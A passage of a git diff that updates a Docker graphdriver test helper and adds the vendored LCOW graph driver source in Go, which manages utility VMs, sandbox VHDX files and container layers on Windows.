dirFS.Lchown(subdir, 1, 2)) - file := path.Join(dir, "a file") - if err := ioutil.WriteFile(file, []byte("Some data"), 0222|os.ModeSetuid); err != nil { - t.Fatal(err) - } + file := dirFS.Join(dirFS.Path(), "a file") + err = contdriver.WriteFile(dirFS, file, []byte("Some data"), 0222|os.ModeSetuid) + assert.NilError(t, err) } func verifyBase(t testing.TB, driver graphdriver.Driver, name string) { - dir, err := driver.Get(name, "") - if err != nil { - t.Fatal(err) - } + dirFS, err 
:= driver.Get(name, "") + assert.NilError(t, err) defer driver.Put(name) - subdir := path.Join(dir, "a subdir") + subdir := dirFS.Join(dirFS.Path(), "a subdir") verifyFile(t, subdir, 0705|os.ModeDir|os.ModeSticky, 1, 2) - file := path.Join(dir, "a file") + file := dirFS.Join(dirFS.Path(), "a file") verifyFile(t, file, 0222|os.ModeSetuid, 0, 0) - fis, err := readDir(dir) - if err != nil { - t.Fatal(err) - } - - if len(fis) != 2 { - t.Fatal("Unexpected files in base image") - } - + files, err := readDir(dirFS, dirFS.Path()) + assert.NilError(t, err) + assert.Check(t, is.Len(files, 2)) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go new file mode 100644 index 0000000000..649beccdc6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go @@ -0,0 +1,1052 @@ +// +build windows + +// Maintainer: jhowardmsft +// Locale: en-gb +// About: Graph-driver for Linux Containers On Windows (LCOW) +// +// This graphdriver runs in two modes. Yet to be determined which one will +// be the shipping mode. The global mode is where a single utility VM +// is used for all service VM tool operations. This isn't safe security-wise +// as it's attaching a sandbox of multiple containers to it, containing +// untrusted data. This may be fine for client devops scenarios. In +// safe mode, a unique utility VM is instantiated for all service VM tool +// operations. The downside of safe-mode is that operations are slower as +// a new service utility VM has to be started and torn-down when needed. 
+// +// Options: +// +// The following options are read by the graphdriver itself: +// +// * lcow.globalmode - Enables global service VM Mode +// -- Possible values: true/false +// -- Default if omitted: false +// +// * lcow.sandboxsize - Specifies a custom sandbox size in GB for starting a container +// -- Possible values: >= default sandbox size (opengcs defined, currently 20) +// -- Default if omitted: 20 +// +// The following options are read by opengcs: +// +// * lcow.kirdpath - Specifies a custom path to a kernel/initrd pair +// -- Possible values: Any local path that is not a mapped drive +// -- Default if omitted: %ProgramFiles%\Linux Containers +// +// * lcow.kernel - Specifies a custom kernel file located in the `lcow.kirdpath` path +// -- Possible values: Any valid filename +// -- Default if omitted: bootx64.efi +// +// * lcow.initrd - Specifies a custom initrd file located in the `lcow.kirdpath` path +// -- Possible values: Any valid filename +// -- Default if omitted: initrd.img +// +// * lcow.bootparameters - Specifies additional boot parameters for booting in kernel+initrd mode +// -- Possible values: Any valid linux kernel boot options +// -- Default if omitted: +// +// * lcow.vhdx - Specifies a custom vhdx file to boot (instead of a kernel+initrd) +// -- Possible values: Any valid filename +// -- Default if omitted: uvm.vhdx under `lcow.kirdpath` +// +// * lcow.timeout - Specifies a timeout for utility VM operations in seconds +// -- Possible values: >=0 +// -- Default if omitted: 300 + +// TODO: Grab logs from SVM at terminate or errors + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/client" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + 
"github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" +) + +// init registers this driver to the register. It gets initialised by the +// function passed in the second parameter, implemented in this file. +func init() { + graphdriver.Register("lcow", InitDriver) +} + +const ( + // sandboxFilename is the name of the file containing a layer's sandbox (read-write layer). + sandboxFilename = "sandbox.vhdx" + + // scratchFilename is the name of the scratch-space used by an SVM to avoid running out of memory. + scratchFilename = "scratch.vhdx" + + // layerFilename is the name of the file containing a layer's read-only contents. + // Note this really is VHD format, not VHDX. + layerFilename = "layer.vhd" + + // toolsScratchPath is a location in a service utility VM that the tools can use as a + // scratch space to avoid running out of memory. + toolsScratchPath = "/tmp/scratch" + + // svmGlobalID is the ID used in the serviceVMs map for the global service VM when running in "global" mode. + svmGlobalID = "_lcow_global_svm_" + + // cacheDirectory is the sub-folder under the driver's data-root used to cache blank sandbox and scratch VHDs. + cacheDirectory = "cache" + + // scratchDirectory is the sub-folder under the driver's data-root used for scratch VHDs in service VMs + scratchDirectory = "scratch" + + // errOperationPending is the HRESULT returned by the HCS when the VM termination operation is still pending. + errOperationPending syscall.Errno = 0xc0370103 +) + +// Driver represents an LCOW graph driver. +type Driver struct { + dataRoot string // Root path on the host where we are storing everything. + cachedSandboxFile string // Location of the local default-sized cached sandbox. + cachedSandboxMutex sync.Mutex // Protects race conditions from multiple threads creating the cached sandbox. 
+ cachedScratchFile string // Location of the local cached empty scratch space. + cachedScratchMutex sync.Mutex // Protects race conditions from multiple threads creating the cached scratch. + options []string // Graphdriver options we are initialised with. + globalMode bool // Indicates if running in an unsafe/global service VM mode. + + // NOTE: It is OK to use a cache here because Windows does not support + // restoring containers when the daemon dies. + serviceVms *serviceVMMap // Map of the configs representing the service VM(s) we are running. +} + +// layerDetails is the structure returned by a helper function `getLayerDetails` +// for getting information about a layer folder +type layerDetails struct { + filename string // \path\to\sandbox.vhdx or \path\to\layer.vhd + size int64 // size of the above file + isSandbox bool // true if sandbox.vhdx +} + +// deletefiles is a helper function for initialisation where we delete any +// left-over scratch files in case we were previously forcibly terminated. +func deletefiles(path string, f os.FileInfo, err error) error { + if strings.HasSuffix(f.Name(), ".vhdx") { + logrus.Warnf("lcowdriver: init: deleting stale scratch file %s", path) + return os.Remove(path) + } + return nil +} + +// InitDriver returns a new LCOW storage driver. 
+func InitDriver(dataRoot string, options []string, _, _ []idtools.IDMap) (graphdriver.Driver, error) { + title := "lcowdriver: init:" + + cd := filepath.Join(dataRoot, cacheDirectory) + sd := filepath.Join(dataRoot, scratchDirectory) + + d := &Driver{ + dataRoot: dataRoot, + options: options, + cachedSandboxFile: filepath.Join(cd, sandboxFilename), + cachedScratchFile: filepath.Join(cd, scratchFilename), + serviceVms: &serviceVMMap{ + svms: make(map[string]*serviceVMMapItem), + }, + globalMode: false, + } + + // Looks for relevant options + for _, v := range options { + opt := strings.SplitN(v, "=", 2) + if len(opt) == 2 { + switch strings.ToLower(opt[0]) { + case "lcow.globalmode": + var err error + d.globalMode, err = strconv.ParseBool(opt[1]) + if err != nil { + return nil, fmt.Errorf("%s failed to parse value for 'lcow.globalmode' - must be 'true' or 'false'", title) + } + break + } + } + } + + // Make sure the dataRoot directory is created + if err := idtools.MkdirAllAndChown(dataRoot, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("%s failed to create '%s': %v", title, dataRoot, err) + } + + // Make sure the cache directory is created under dataRoot + if err := idtools.MkdirAllAndChown(cd, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("%s failed to create '%s': %v", title, cd, err) + } + + // Make sure the scratch directory is created under dataRoot + if err := idtools.MkdirAllAndChown(sd, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("%s failed to create '%s': %v", title, sd, err) + } + + // Delete any items in the scratch directory + filepath.Walk(sd, deletefiles) + + logrus.Infof("%s dataRoot: %s globalMode: %t", title, dataRoot, d.globalMode) + + return d, nil +} + +func (d *Driver) getVMID(id string) string { + if d.globalMode { + return svmGlobalID + } + return id +} + +// startServiceVMIfNotRunning starts a service utility VM if it is not currently running. 
+// It can optionally be started with a mapped virtual disk. Returns a opengcs config structure +// representing the VM. +func (d *Driver) startServiceVMIfNotRunning(id string, mvdToAdd []hcsshim.MappedVirtualDisk, context string) (_ *serviceVM, err error) { + // Use the global ID if in global mode + id = d.getVMID(id) + + title := fmt.Sprintf("lcowdriver: startservicevmifnotrunning %s:", id) + + // Attempt to add ID to the service vm map + logrus.Debugf("%s: Adding entry to service vm map", title) + svm, exists, err := d.serviceVms.add(id) + if err != nil && err == errVMisTerminating { + // VM is in the process of terminating. Wait until it's done and and then try again + logrus.Debugf("%s: VM with current ID still in the process of terminating: %s", title, id) + if err := svm.getStopError(); err != nil { + logrus.Debugf("%s: VM %s did not stop successfully: %s", title, id, err) + return nil, err + } + return d.startServiceVMIfNotRunning(id, mvdToAdd, context) + } else if err != nil { + logrus.Debugf("%s: failed to add service vm to map: %s", err) + return nil, fmt.Errorf("%s: failed to add to service vm map: %s", title, err) + } + + if exists { + // Service VM is already up and running. In this case, just hot add the vhds. + logrus.Debugf("%s: service vm already exists. Just hot adding: %+v", title, mvdToAdd) + if err := svm.hotAddVHDs(mvdToAdd...); err != nil { + logrus.Debugf("%s: failed to hot add vhds on service vm creation: %s", title, err) + return nil, fmt.Errorf("%s: failed to hot add vhds on service vm: %s", title, err) + } + return svm, nil + } + + // We are the first service for this id, so we need to start it + logrus.Debugf("%s: service vm doesn't exist. Now starting it up: %s", title, id) + + defer func() { + // Signal that start has finished, passing in the error if any. + svm.signalStartFinished(err) + if err != nil { + // We added a ref to the VM, since we failed, we should delete the ref. 
+ d.terminateServiceVM(id, "error path on startServiceVMIfNotRunning", false) + } + }() + + // Generate a default configuration + if err := svm.config.GenerateDefault(d.options); err != nil { + return nil, fmt.Errorf("%s failed to generate default gogcs configuration for global svm (%s): %s", title, context, err) + } + + // For the name, we deliberately suffix if safe-mode to ensure that it doesn't + // clash with another utility VM which may be running for the container itself. + // This also makes it easier to correlate through Get-ComputeProcess. + if id == svmGlobalID { + svm.config.Name = svmGlobalID + } else { + svm.config.Name = fmt.Sprintf("%s_svm", id) + } + + // Ensure we take the cached scratch mutex around the check to ensure the file is complete + // and not in the process of being created by another thread. + scratchTargetFile := filepath.Join(d.dataRoot, scratchDirectory, fmt.Sprintf("%s.vhdx", id)) + + logrus.Debugf("%s locking cachedScratchMutex", title) + d.cachedScratchMutex.Lock() + if _, err := os.Stat(d.cachedScratchFile); err == nil { + // Make a copy of cached scratch to the scratch directory + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) cloning cached scratch for mvd", context) + if err := client.CopyFile(d.cachedScratchFile, scratchTargetFile, true); err != nil { + logrus.Debugf("%s releasing cachedScratchMutex on err: %s", title, err) + d.cachedScratchMutex.Unlock() + return nil, err + } + + // Add the cached clone as a mapped virtual disk + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) adding cloned scratch as mvd", context) + mvd := hcsshim.MappedVirtualDisk{ + HostPath: scratchTargetFile, + ContainerPath: toolsScratchPath, + CreateInUtilityVM: true, + } + svm.config.MappedVirtualDisks = append(svm.config.MappedVirtualDisks, mvd) + svm.scratchAttached = true + } + + logrus.Debugf("%s releasing cachedScratchMutex", title) + d.cachedScratchMutex.Unlock() + + // If requested to start it with a mapped virtual 
disk, add it now. + svm.config.MappedVirtualDisks = append(svm.config.MappedVirtualDisks, mvdToAdd...) + for _, mvd := range svm.config.MappedVirtualDisks { + svm.attachedVHDs[mvd.HostPath] = 1 + } + + // Start it. + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) starting %s", context, svm.config.Name) + if err := svm.config.StartUtilityVM(); err != nil { + return nil, fmt.Errorf("failed to start service utility VM (%s): %s", context, err) + } + + // defer function to terminate the VM if the next steps fail + defer func() { + if err != nil { + waitTerminate(svm, fmt.Sprintf("startServiceVmIfNotRunning: %s (%s)", id, context)) + } + }() + + // Now we have a running service VM, we can create the cached scratch file if it doesn't exist. + logrus.Debugf("%s locking cachedScratchMutex", title) + d.cachedScratchMutex.Lock() + if _, err := os.Stat(d.cachedScratchFile); err != nil { + logrus.Debugf("%s (%s): creating an SVM scratch", title, context) + + // Don't use svm.CreateExt4Vhdx since that only works when the service vm is setup, + // but we're still in that process right now. 
+ if err := svm.config.CreateExt4Vhdx(scratchTargetFile, client.DefaultVhdxSizeGB, d.cachedScratchFile); err != nil { + logrus.Debugf("%s (%s): releasing cachedScratchMutex on error path", title, context) + d.cachedScratchMutex.Unlock() + logrus.Debugf("%s: failed to create vm scratch %s: %s", title, scratchTargetFile, err) + return nil, fmt.Errorf("failed to create SVM scratch VHDX (%s): %s", context, err) + } + } + logrus.Debugf("%s (%s): releasing cachedScratchMutex", title, context) + d.cachedScratchMutex.Unlock() + + // Hot-add the scratch-space if not already attached + if !svm.scratchAttached { + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) hot-adding scratch %s", context, scratchTargetFile) + if err := svm.hotAddVHDsAtStart(hcsshim.MappedVirtualDisk{ + HostPath: scratchTargetFile, + ContainerPath: toolsScratchPath, + CreateInUtilityVM: true, + }); err != nil { + logrus.Debugf("%s: failed to hot-add scratch %s: %s", title, scratchTargetFile, err) + return nil, fmt.Errorf("failed to hot-add %s failed: %s", scratchTargetFile, err) + } + svm.scratchAttached = true + } + + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) success", context) + return svm, nil +} + +// terminateServiceVM terminates a service utility VM if its running if it's, +// not being used by any goroutine, but does nothing when in global mode as it's +// lifetime is limited to that of the daemon. If the force flag is set, then +// the VM will be killed regardless of the ref count or if it's global. +func (d *Driver) terminateServiceVM(id, context string, force bool) (err error) { + // We don't do anything in safe mode unless the force flag has been passed, which + // is only the case for cleanup at driver termination. 
+ if d.globalMode && !force { + logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - doing nothing as in global mode", id, context) + return nil + } + + id = d.getVMID(id) + + var svm *serviceVM + var lastRef bool + if !force { + // In the not force case, we ref count + svm, lastRef, err = d.serviceVms.decrementRefCount(id) + } else { + // In the force case, we ignore the ref count and just set it to 0 + svm, err = d.serviceVms.setRefCountZero(id) + lastRef = true + } + + if err == errVMUnknown { + return nil + } else if err == errVMisTerminating { + return svm.getStopError() + } else if !lastRef { + return nil + } + + // We run the deletion of the scratch as a deferred function to at least attempt + // clean-up in case of errors. + defer func() { + if svm.scratchAttached { + scratchTargetFile := filepath.Join(d.dataRoot, scratchDirectory, fmt.Sprintf("%s.vhdx", id)) + logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - deleting scratch %s", id, context, scratchTargetFile) + if errRemove := os.Remove(scratchTargetFile); errRemove != nil { + logrus.Warnf("failed to remove scratch file %s (%s): %s", scratchTargetFile, context, errRemove) + err = errRemove + } + } + + // This function shouldn't actually return error unless there is a bug + if errDelete := d.serviceVms.deleteID(id); errDelete != nil { + logrus.Warnf("failed to service vm from svm map %s (%s): %s", id, context, errDelete) + } + + // Signal that this VM has stopped + svm.signalStopFinished(err) + }() + + // Now it's possible that the service VM failed to start and now we are trying to terminate it. + // In this case, we will relay the error to the goroutines waiting for this vm to stop. 
+ if err := svm.getStartError(); err != nil { + logrus.Debugf("lcowdriver: terminateservicevm: %s had failed to start up: %s", id, err) + return err + } + + if err := waitTerminate(svm, fmt.Sprintf("terminateservicevm: %s (%s)", id, context)); err != nil { + return err + } + + logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - success", id, context) + return nil +} + +func waitTerminate(svm *serviceVM, context string) error { + if svm.config == nil { + return fmt.Errorf("lcowdriver: waitTermiante: Nil utility VM. %s", context) + } + + logrus.Debugf("lcowdriver: waitTerminate: Calling terminate: %s", context) + if err := svm.config.Uvm.Terminate(); err != nil { + // We might get operation still pending from the HCS. In that case, we shouldn't return + // an error since we call wait right after. + underlyingError := err + if conterr, ok := err.(*hcsshim.ContainerError); ok { + underlyingError = conterr.Err + } + + if syscallErr, ok := underlyingError.(syscall.Errno); ok { + underlyingError = syscallErr + } + + if underlyingError != errOperationPending { + return fmt.Errorf("failed to terminate utility VM (%s): %s", context, err) + } + logrus.Debugf("lcowdriver: waitTerminate: uvm.Terminate() returned operation pending (%s)", context) + } + + logrus.Debugf("lcowdriver: waitTerminate: (%s) - waiting for utility VM to terminate", context) + if err := svm.config.Uvm.WaitTimeout(time.Duration(svm.config.UvmTimeoutSeconds) * time.Second); err != nil { + return fmt.Errorf("failed waiting for utility VM to terminate (%s): %s", context, err) + } + return nil +} + +// String returns the string representation of a driver. This should match +// the name the graph driver has been registered with. +func (d *Driver) String() string { + return "lcow" +} + +// Status returns the status of the driver. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"LCOW", ""}, + // TODO: Add some more info here - mode, home, .... 
+ } +} + +// Exists returns true if the given id is registered with this driver. +func (d *Driver) Exists(id string) bool { + _, err := os.Lstat(d.dir(id)) + logrus.Debugf("lcowdriver: exists: id %s %t", id, err == nil) + return err == nil +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. That equates to creating a sandbox. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + title := fmt.Sprintf("lcowdriver: createreadwrite: id %s", id) + logrus.Debugf(title) + + // First we need to create the folder + if err := d.Create(id, parent, opts); err != nil { + return err + } + + // Look for an explicit sandbox size option. + sandboxSize := uint64(client.DefaultVhdxSizeGB) + for k, v := range opts.StorageOpt { + switch strings.ToLower(k) { + case "lcow.sandboxsize": + var err error + sandboxSize, err = strconv.ParseUint(v, 10, 32) + if err != nil { + return fmt.Errorf("%s failed to parse value '%s' for 'lcow.sandboxsize'", title, v) + } + if sandboxSize < client.DefaultVhdxSizeGB { + return fmt.Errorf("%s 'lcow.sandboxsize' option cannot be less than %d", title, client.DefaultVhdxSizeGB) + } + break + } + } + + // Massive perf optimisation here. If we know that the RW layer is the default size, + // and that the cached sandbox already exists, and we are running in safe mode, we + // can just do a simple copy into the layers sandbox file without needing to start a + // unique service VM. For a global service VM, it doesn't really matter. Of course, + // this is only the case where the sandbox is the default size. + // + // Make sure we have the sandbox mutex taken while we are examining it. 
+ if sandboxSize == client.DefaultVhdxSizeGB { + logrus.Debugf("%s: locking cachedSandboxMutex", title) + d.cachedSandboxMutex.Lock() + _, err := os.Stat(d.cachedSandboxFile) + logrus.Debugf("%s: releasing cachedSandboxMutex", title) + d.cachedSandboxMutex.Unlock() + if err == nil { + logrus.Debugf("%s: using cached sandbox to populate", title) + if err := client.CopyFile(d.cachedSandboxFile, filepath.Join(d.dir(id), sandboxFilename), true); err != nil { + return err + } + return nil + } + } + + logrus.Debugf("%s: creating SVM to create sandbox", title) + svm, err := d.startServiceVMIfNotRunning(id, nil, "createreadwrite") + if err != nil { + return err + } + defer d.terminateServiceVM(id, "createreadwrite", false) + + // So the sandbox needs creating. If default size ensure we are the only thread populating the cache. + // Non-default size we don't store, just create them one-off so no need to lock the cachedSandboxMutex. + if sandboxSize == client.DefaultVhdxSizeGB { + logrus.Debugf("%s: locking cachedSandboxMutex for creation", title) + d.cachedSandboxMutex.Lock() + defer func() { + logrus.Debugf("%s: releasing cachedSandboxMutex for creation", title) + d.cachedSandboxMutex.Unlock() + }() + } + + // Make sure we don't write to our local cached copy if this is for a non-default size request. + targetCacheFile := d.cachedSandboxFile + if sandboxSize != client.DefaultVhdxSizeGB { + targetCacheFile = "" + } + + // Create the ext4 vhdx + logrus.Debugf("%s: creating sandbox ext4 vhdx", title) + if err := svm.createExt4VHDX(filepath.Join(d.dir(id), sandboxFilename), uint32(sandboxSize), targetCacheFile); err != nil { + logrus.Debugf("%s: failed to create sandbox vhdx for %s: %s", title, id, err) + return err + } + return nil +} + +// Create creates the folder for the layer with the given id, and +// adds it to the layer chain. 
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + logrus.Debugf("lcowdriver: create: id %s parent: %s", id, parent) + + parentChain, err := d.getLayerChain(parent) + if err != nil { + return err + } + + var layerChain []string + if parent != "" { + if !d.Exists(parent) { + return fmt.Errorf("lcowdriver: cannot create layer folder with missing parent %s", parent) + } + layerChain = []string{d.dir(parent)} + } + layerChain = append(layerChain, parentChain...) + + // Make sure layers are created with the correct ACL so that VMs can access them. + layerPath := d.dir(id) + logrus.Debugf("lcowdriver: create: id %s: creating %s", id, layerPath) + if err := system.MkdirAllWithACL(layerPath, 755, system.SddlNtvmAdministratorsLocalSystem); err != nil { + return err + } + + if err := d.setLayerChain(id, layerChain); err != nil { + if err2 := os.RemoveAll(layerPath); err2 != nil { + logrus.Warnf("failed to remove layer %s: %s", layerPath, err2) + } + return err + } + logrus.Debugf("lcowdriver: create: id %s: success", id) + + return nil +} + +// Remove unmounts and removes the dir information. 
+func (d *Driver) Remove(id string) error { + logrus.Debugf("lcowdriver: remove: id %s", id) + tmpID := fmt.Sprintf("%s-removing", id) + tmpLayerPath := d.dir(tmpID) + layerPath := d.dir(id) + + logrus.Debugf("lcowdriver: remove: id %s: layerPath %s", id, layerPath) + + // Unmount all the layers + err := d.Put(id) + if err != nil { + logrus.Debugf("lcowdriver: remove id %s: failed to unmount: %s", id, err) + return err + } + + // for non-global case just kill the vm + if !d.globalMode { + if err := d.terminateServiceVM(id, fmt.Sprintf("Remove %s", id), true); err != nil { + return err + } + } + + if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) { + return err + } + + if err := os.RemoveAll(tmpLayerPath); err != nil { + return err + } + + logrus.Debugf("lcowdriver: remove: id %s: layerPath %s succeeded", id, layerPath) + return nil +} + +// Get returns the rootfs path for the id. It is reference counted and +// effectively can be thought of as a "mount the layer into the utility +// vm if it isn't already". The contract from the caller of this is that +// all Gets and Puts are matched. It -should- be the case that on cleanup, +// nothing is mounted. +// +// For optimisation, we don't actually mount the filesystem (which in our +// case means [hot-]adding it to a service VM. But we track that and defer +// the actual adding to the point we need to access it. +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { + title := fmt.Sprintf("lcowdriver: get: %s", id) + logrus.Debugf(title) + + // Generate the mounts needed for the defered operation. 
+ disks, err := d.getAllMounts(id) + if err != nil { + logrus.Debugf("%s failed to get all layer details for %s: %s", title, d.dir(id), err) + return nil, fmt.Errorf("%s failed to get layer details for %s: %s", title, d.dir(id), err) + } + + logrus.Debugf("%s: got layer mounts: %+v", title, disks) + return &lcowfs{ + root: unionMountName(disks), + d: d, + mappedDisks: disks, + vmID: d.getVMID(id), + }, nil +} + +// Put does the reverse of get. If there are no more references to +// the layer, it unmounts it from the utility VM. +func (d *Driver) Put(id string) error { + title := fmt.Sprintf("lcowdriver: put: %s", id) + + // Get the service VM that we need to remove from + svm, err := d.serviceVms.get(d.getVMID(id)) + if err == errVMUnknown { + return nil + } else if err == errVMisTerminating { + return svm.getStopError() + } + + // Generate the mounts that Get() might have mounted + disks, err := d.getAllMounts(id) + if err != nil { + logrus.Debugf("%s failed to get all layer details for %s: %s", title, d.dir(id), err) + return fmt.Errorf("%s failed to get layer details for %s: %s", title, d.dir(id), err) + } + + // Now, we want to perform the unmounts, hot-remove and stop the service vm. + // We want to go though all the steps even if we have an error to clean up properly + err = svm.deleteUnionMount(unionMountName(disks), disks...) + if err != nil { + logrus.Debugf("%s failed to delete union mount %s: %s", title, id, err) + } + + err1 := svm.hotRemoveVHDs(disks...) + if err1 != nil { + logrus.Debugf("%s failed to hot remove vhds %s: %s", title, id, err) + if err == nil { + err = err1 + } + } + + err1 = d.terminateServiceVM(id, fmt.Sprintf("Put %s", id), false) + if err1 != nil { + logrus.Debugf("%s failed to terminate service vm %s: %s", title, id, err1) + if err == nil { + err = err1 + } + } + logrus.Debugf("Put succeeded on id %s", id) + return err +} + +// Cleanup ensures the information the driver stores is properly removed. 
+// We use this opportunity to cleanup any -removing folders which may be +// still left if the daemon was killed while it was removing a layer. +func (d *Driver) Cleanup() error { + title := "lcowdriver: cleanup" + + items, err := ioutil.ReadDir(d.dataRoot) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + // Note we don't return an error below - it's possible the files + // are locked. However, next time around after the daemon exits, + // we likely will be able to to cleanup successfully. Instead we log + // warnings if there are errors. + for _, item := range items { + if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") { + if err := os.RemoveAll(filepath.Join(d.dataRoot, item.Name())); err != nil { + logrus.Warnf("%s failed to cleanup %s: %s", title, item.Name(), err) + } else { + logrus.Infof("%s cleaned up %s", title, item.Name()) + } + } + } + + // Cleanup any service VMs we have running, along with their scratch spaces. + // We don't take the lock for this as it's taken in terminateServiceVm. + for k, v := range d.serviceVms.svms { + logrus.Debugf("%s svm entry: %s: %+v", title, k, v) + d.terminateServiceVM(k, "cleanup", true) + } + + return nil +} + +// Diff takes a layer (and it's parent layer which may be null, but +// is ignored by this implementation below) and returns a reader for +// a tarstream representing the layers contents. The id could be +// a read-only "layer.vhd" or a read-write "sandbox.vhdx". The semantics +// of this function dictate that the layer is already mounted. +// However, as we do lazy mounting as a performance optimisation, +// this will likely not be the case. 
+func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { + title := fmt.Sprintf("lcowdriver: diff: %s", id) + + // Get VHDX info + ld, err := getLayerDetails(d.dir(id)) + if err != nil { + logrus.Debugf("%s: failed to get vhdx information of %s: %s", title, d.dir(id), err) + return nil, err + } + + // Start the SVM with a mapped virtual disk. Note that if the SVM is + // already running and we are in global mode, this will be + // hot-added. + mvd := hcsshim.MappedVirtualDisk{ + HostPath: ld.filename, + ContainerPath: hostToGuest(ld.filename), + CreateInUtilityVM: true, + ReadOnly: true, + } + + logrus.Debugf("%s: starting service VM", title) + svm, err := d.startServiceVMIfNotRunning(id, []hcsshim.MappedVirtualDisk{mvd}, fmt.Sprintf("diff %s", id)) + if err != nil { + return nil, err + } + + logrus.Debugf("lcowdriver: diff: waiting for svm to finish booting") + err = svm.getStartError() + if err != nil { + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil, fmt.Errorf("lcowdriver: diff: svm failed to boot: %s", err) + } + + // Obtain the tar stream for it + logrus.Debugf("%s: %s %s, size %d, ReadOnly %t", title, ld.filename, mvd.ContainerPath, ld.size, ld.isSandbox) + tarReadCloser, err := svm.config.VhdToTar(mvd.HostPath, mvd.ContainerPath, ld.isSandbox, ld.size) + if err != nil { + svm.hotRemoveVHDs(mvd) + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil, fmt.Errorf("%s failed to export layer to tar stream for id: %s, parent: %s : %s", title, id, parent, err) + } + + logrus.Debugf("%s id %s parent %s completed successfully", title, id, parent) + + // In safe/non-global mode, we can't tear down the service VM until things have been read. 
+ return ioutils.NewReadCloserWrapper(tarReadCloser, func() error { + tarReadCloser.Close() + svm.hotRemoveVHDs(mvd) + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil + }), nil +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. The layer should not be mounted when calling +// this function. Another way of describing this is that ApplyDiff writes +// to a new layer (a VHD in LCOW) the contents of a tarstream it's given. +func (d *Driver) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + logrus.Debugf("lcowdriver: applydiff: id %s", id) + + svm, err := d.startServiceVMIfNotRunning(id, nil, fmt.Sprintf("applydiff %s", id)) + if err != nil { + return 0, err + } + defer d.terminateServiceVM(id, fmt.Sprintf("applydiff %s", id), false) + + logrus.Debugf("lcowdriver: applydiff: waiting for svm to finish booting") + err = svm.getStartError() + if err != nil { + return 0, fmt.Errorf("lcowdriver: applydiff: svm failed to boot: %s", err) + } + + // TODO @jhowardmsft - the retries are temporary to overcome platform reliability issues. + // Obviously this will be removed as platform bugs are fixed. + retries := 0 + for { + retries++ + size, err := svm.config.TarToVhd(filepath.Join(d.dataRoot, id, layerFilename), diff) + if err != nil { + if retries <= 10 { + continue + } + return 0, err + } + return size, err + } +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +// The layer should not be mounted when calling this function. +func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { + logrus.Debugf("lcowdriver: changes: id %s parent %s", id, parent) + // TODO @gupta-ak. 
Needs implementation with assistance from service VM + return nil, nil +} + +// DiffSize calculates the changes between the specified layer +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (d *Driver) DiffSize(id, parent string) (size int64, err error) { + logrus.Debugf("lcowdriver: diffsize: id %s", id) + // TODO @gupta-ak. Needs implementation with assistance from service VM + return 0, nil +} + +// GetMetadata returns custom driver information. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + logrus.Debugf("lcowdriver: getmetadata: id %s", id) + m := make(map[string]string) + m["dir"] = d.dir(id) + return m, nil +} + +// GetLayerPath gets the layer path on host (path to VHD/VHDX) +func (d *Driver) GetLayerPath(id string) (string, error) { + return d.dir(id), nil +} + +// dir returns the absolute path to the layer. +func (d *Driver) dir(id string) string { + return filepath.Join(d.dataRoot, filepath.Base(id)) +} + +// getLayerChain returns the layer chain information. +func (d *Driver) getLayerChain(id string) ([]string, error) { + jPath := filepath.Join(d.dir(id), "layerchain.json") + logrus.Debugf("lcowdriver: getlayerchain: id %s json %s", id, jPath) + content, err := ioutil.ReadFile(jPath) + if os.IsNotExist(err) { + return nil, nil + } else if err != nil { + return nil, fmt.Errorf("lcowdriver: getlayerchain: %s unable to read layerchain file %s: %s", id, jPath, err) + } + + var layerChain []string + err = json.Unmarshal(content, &layerChain) + if err != nil { + return nil, fmt.Errorf("lcowdriver: getlayerchain: %s failed to unmarshall layerchain file %s: %s", id, jPath, err) + } + return layerChain, nil +} + +// setLayerChain stores the layer chain information on disk. 
